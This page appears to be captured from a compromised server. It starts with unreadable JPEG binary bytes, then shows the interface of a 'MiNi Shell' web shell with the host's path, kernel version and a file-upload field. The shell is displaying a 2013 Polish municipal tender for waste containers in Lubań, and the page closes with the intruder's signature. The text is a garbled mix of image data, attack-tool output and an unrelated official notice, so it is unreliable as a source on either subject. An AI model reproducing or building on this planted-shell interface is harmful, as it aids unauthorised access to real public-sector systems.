JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130417/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130417/151590-N-2013.html

<p class="kh_header"><b>Lubań: Dostawa pojemników i innych urządzeń do gromadzenia odpadów komunalnych</b><br>
<b>Numer ogłoszenia: 151590 - 2013; data zamieszczenia: 17.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki i Usług Komunalnych Sp. z o.o. , ul. Lwówecka 8, 59-800 Lubań, woj. dolnośląskie, tel. 075 7222229, 7222329, faks 075 7224633.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgiuk.luban.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczoną odpowiedzialnością - 100% własności Gminy Miejskiej Lubań.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa pojemników i innych urządzeń do gromadzenia odpadów komunalnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
 1. w zakresie zadania nr 1 dotyczy  dostawy POTRÓJNYCH STOJAKÓW Z PRZYKRYWĄ DO SEGREGACJI ODPADÓW  w ilości 4 000 szt.
Szczegółowy opis przedmiotu zamówienia dla zadania nr 1  określone jest w załączniku nr 7 do SIWZ.
2    Przedmiot zamówienia w zakresie zadania nr 2 dotyczy  dostawy POJEMNIKÓW   Z TWORZYWA SZTUCZNEGO NA BIOODPADY o poj.  0,12 m3 w ilości 1.500 szt.,      
   Szczegółowy opis przedmiotu zamówienia dla zadania nr 2  określone jest w załączniku nr 8 do SIWZ 
3      Przedmiot zamówienia w zakresie zadania nr 3 dotyczy  dostawy POJEMNIKÓW   Z TWORZYWA SZTUCZNEGO NA BIOODPADY o poj.  0,24 m3 w ilości 300 szt.,      
   Szczegółowy opis przedmiotu zamówienia dla zadania nr 3  określone jest w załączniku nr 9 do SIWZ 
4 Przedmiot zamówienia w zakresie zadania nr 4 dotyczy  dostawy POJEMNIKÓW   Z TWORZYWA SZTUCZNEGO NA KOMUNALNE ODPADY ZMIESZANE  o poj.  1,10 m3 w ilości 100 szt.,      
   Szczegółowy opis przedmiotu zamówienia dla zadania nr 4  określone jest w załączniku nr 10 do SIWZ 
5 Przedmiot zamówienia w zakresie zadania nr 5 dotyczy  dostawy POJEMNIKÓW   Z TWORZYWA SZTUCZNEGO NA BIOODPADY  o poj.  0,01 m3 w ilości 10 000 szt.,      
   Szczegółowy opis przedmiotu zamówienia dla zadania nr 5  określone jest w załączniku nr 11 do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.92.84.80-6, 39.15.11.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
 Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Ocena spełnienia w.w warunku udziału w postępowaniu dokonywana będzie
w oparciu o złożone przez Wykonawcę:
a)oświadczenie o spełnienie warunków udziału w postępowaniu.
Ocena spełnienia w.w warunku  udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę realizacji:
- dla zadania 1:
 co najmniej jednej dostawy potrójnych stojaków z przykrywą do segregacji odpadów w ilości min. 1 000 szt. 
- dla zadania 2:
 co najmniej dwie dostawy pojemników z tworzywa sztucznego na bioodpady o poj. 0,12 m3 w ilości min. 1 000  szt.
- dla zadania 3:
 co najmniej dwie dostawy pojemników z tworzywa sztucznego na bioodpady o poj. 0,24  m3  w ilości min.  100  szt.
- dla zadania 4:
 co najmniej dwie dostawy pojemników z tworzywa sztucznego na komunalne odpady zmieszane  o poj. 1,10  m3  w ilości min.  100  szt.
- dla zadania 5:
 co najmniej jednej dostawy pojemników z tworzywa sztucznego na bioodpady o poj. 0,01  m3 , 
w okresie  ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie.
Warunek będzie spełniony jeżeli Wykonawca wykaże  dostawę  przedmiotu zamówienia w ilości jak wyżej.
Ocena spełnienia w.w warunku udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę:
a) wykaz dostaw  w zakresie niezbędnym do wykazania spełnienia
warunku wiedzy i doświadczenia  sporządzony przez Wykonawcę samodzielnie lub z wykorzystaniem załącznika do SIWZ z podaniem dat wykonania i podmiotów na rzecz których dostawy zostały  wykonane ,
b) dokumenty potwierdzające, że  wymieniono w wykazie dostawy zostały wykonane należycie ,
c) oświadczenie o spełnieniu warunków udziału w postępowaniu,
Ocena spełnienia w.w warunku  udziału w postępowaniu dokonywana będzie w oparciu o dokumenty i oświadczenie  złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Ocena spełnienia w.w warunku udziału w postępowaniu dokonywana będzie
w oparciu o złożone przez Wykonawcę:
a)oświadczenie o spełnienie warunków udziału w postępowaniu.
Ocena spełnienia w.w warunku  udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Ocena spełnienia w.w warunku udziału w postępowaniu dokonywana będzie
w oparciu o złożone przez Wykonawcę:
a)oświadczenie o spełnienie warunków udziału w postępowaniu.
Ocena spełnienia w.w warunku  udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Ocena spełnienia w.w warunku udziału w postępowaniu dokonywana będzie
w oparciu o złożone przez Wykonawcę:
a)oświadczenie o spełnienie warunków udziału w postępowaniu.
Ocena spełnienia w.w warunku  udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgiuk.luban.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarki i Usług Komunalnych Sp. z o.o. w Lubaniu
ul. Lwówecka 8
59-800 Lubań 
- sekretariat -.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.04.2013 godzina 09:00, miejsce: Zakład Gospodarki i Usług Komunalnych Sp. z o.o. w Lubaniu
ul. Lwówecka 8
59-800 Lubań 
- sekretariat -.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> DOSTAWA POTRÓJNYCH STOJAKÓW Z PRZYKRYWĄ DO SEGREGACJI ODPADÓW w ilości 4 000 szt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Stojak potrójny (składany)
2.Wykonany z rurki aluminiowej 
3.Nóżki stojaka zabezpieczone nakładką z tworzywa sztucznego. Zabezpieczenie nóżek    przed rozkładaniem się 
4.Na konstrukcji zamontowane 3 szt. pokrywy z tworzywa sztucznego o wymiarze max 32 cm x 40 cm, w kolorystyce: niebieski, żółty, zielony;
5.Pokrywy montowane na stałe do konstrukcji 
6.W pokrywie zamontowany uchwyt mocujący worki na surowce wtórne
Dostawa przedmiotu zamówienia nastąpi do Centrum Utylizacji Odpadów Gmin Łużyckich w Lubaniu przy ul. Bazaltowej 1 przez Wykonawcę na własny koszt i w terminie określonym przez Zamawiającego jako termin wykonania zamówienia, w trybie określonym w umowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.84.80-6, 39.15.11.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa POJEMNIKÓW NA BIOODPADY 0,12 m3 w ilości 1 500 szt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Dostawa POJEMNIKÓW NA BIOODPADY 0,12 m3 w ilości 1 500 szt. - o następujących parametrach technicznych :
1)Pojemność 0,12 m3
2)Pojemnik z przykrywą na dwóch kółkach jezdnych
3)Wykonanie tworzywo sztuczne
4)Kolor brązowy 
5)Otwory do przepływu powietrza na bokach pojemnika w ilości min.4 szt.
6)Wewnątrz pojemnika ruszt denny na odcieki
7)Konstrukcja pojemnika przystosowana do rozładunku przez samochody śmieciarki wyposażone we wsyp mechaniczny;
8)Na pojemniku winien znajdować się trwały napis: 
  BIOODPADY  ZGiUK Spółka z o. o.59 - 80 Lubań, ul. Lwówecka 8 tel. 75 722- 22 - 29 
2.Dostawa przedmiotu zamówienia nastąpi do Centrum Utylizacji Odpadów Gmin Łużyckich w Lubaniu przy ul. Bazaltowej 1 przez Wykonawcę na własny koszt i w terminie określonym przez Zamawiającego jako termin wykonania zamówienia, w trybie określonym w umowie.                                             
3.W celu potwierdzenia, że oferowane pojemniki odpowiadają wymaganiom określonym w SIWZ oraz innym przepisom prawnym  do oferty należy dołączyć m.in.: kartę katalogową , atest higieniczny, certyfikat - deklarację zgodności, opinię ppoż.  lub inny dokument zakładowy potwierdzający  spełnienie wymagań technicznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.84.80-6, 39.15.11.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa POJEMNIKÓW NA BIOODPADY 0,24 m3 w ilości 300 szt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1Przedmiotem zamówienia jest:
Dostawa POJEMNIKÓW NA BIOODPADY 0,24 m3 w ilości 300 szt. - o następujących parametrach technicznych :
1)Pojemność 0, 24 m3
2)Pojemnik z przykrywą na dwóch kółkach jezdnych
3)Wykonanie tworzywo sztuczne
4)Kolor brązowy 
5)Otwory do przepływu powietrza na bokach pojemnika w ilości min. 4 szt.
6)Wewnątrz pojemnika ruszt denny na odcieki
7)Konstrukcja pojemnika przystosowana do rozładunku przez samochody śmieciarki wyposażone we wsyp mechaniczny;
8)Na pojemniku winien znajdować się trwały napis: 
BIOODPADY ZGiUK Spółka z o. o 59 - 800 Lubań ul. Lwówecka 8 tel. 75 722- 22 - 29
2.Dostawa przedmiotu zamówienia nastąpi do Centrum Utylizacji Odpadów Gmin Łużyckich w Lubaniu przy ul. Bazaltowej 1 przez Wykonawcę na własny koszt i w terminie określonym przez Zamawiającego jako termin wykonania zamówienia, w trybie określonym w umowie.
3.W celu potwierdzenia, że oferowane pojemniki odpowiadają wymaganiom określonym w SIWZ oraz innym przepisom prawnym  do oferty należy dołączyć m.in.: kartę katalogową , atest higieniczny, certyfikat - deklarację zgodności, opinię ppoż.  lub inny dokument zakładowy potwierdzający  spełnienie wymagań technicznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.84.80-6, 39.15.11.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa POJEMNIKÓW NA KOMUNALNE ODPADY ZMIESZANE  1,1 m3 w ilości 100 szt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Dostawa POJEMNIKÓW NA KOMUNALNE ODPADY ZMIESZANE  1,1 m3 w ilości 100 szt. - o następujących parametrach technicznych :
1)Pojemność 1,1 m3
2)Pojemnik z przykrywą na czterech kółkach jezdnych
3)Wykonanie tworzywo sztuczne
4)Kolor zielony
5)Konstrukcja pojemnika przystosowana do rozładunku przez samochody śmieciarki wyposażone we wsyp mechaniczny;
6)Na pojemniku winien znajdować się trwały napis: 
ZGiUK Spółka z o. o.59 - 800 Lubań, ul. Lwówecka 8   tel. 75 722- 22 - 29   
 PROSZĘ NIE WRZUCAĆ GORĄCEGO POPIOŁU
2.Dostawa przedmiotu zamówienia nastąpi do Centrum Utylizacji Odpadów Gmin Łużyckich w Lubaniu przy ul. Bazaltowej 1 przez Wykonawcę na własny koszt i w terminie określonym przez Zamawiającego jako termin wykonania zamówienia, w trybie określonym w umowie.
3.W celu potwierdzenia, że oferowane pojemniki odpowiadają wymaganiom określonym w SIWZ oraz innym przepisom prawnym  do oferty należy dołączyć m.in.: kartę katalogową , atest higieniczny, certyfikat - deklarację zgodności, opinię ppoż.  lub inny dokument zakładowy potwierdzający spełnienie wymagań technicznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.84.80-6, 39.15.11.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa POJEMNIKÓW NA BIOODPADY 0,01 m3 w ilości 10 000 szt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest:
Dostawa POJEMNIKÓW NA BIOODPADY 0,01 m3 w ilości 10 000 szt. - o następujących parametrach technicznych: 1)Pojemność 0,01 m3
2)Pojemnik z przykrywą  3)Wykonanie tworzywo sztuczne , odporne na UV , zimno, nagrzewanie i chemikalia   4)Kolor brązowy 5)Konstrukcja pojemnika przystosowana do tymczasowego gromadzenia bioodpadów w lokalu i transportu ich do pojemników zbiorczych  6)Uchwyt  z drutu lub z  tworzywa2.Dostawa przedmiotu zamówienia nastąpi do Centrum Utylizacji Odpadów Gmin Łużyckich w Lubaniu przy ul. Bazaltowej 1 przez Wykonawcę na własny koszt i w terminie określonym przez Zamawiającego jako termin wykonania zamówienia, w trybie określonym w umowie.
3.W celu potwierdzenia, że oferowane pojemniki odpowiadają wymaganiom określonym w SIWZ oraz innym przepisom prawnym  do oferty należy dołączyć m.in.: kartę katalogową , atest higieniczny, certyfikat - deklarację zgodności, opinię ppoż. lub inny dokument zakładowy potwierdzający spełnienie wymagań technicznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.84.80-6, 39.15.11.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com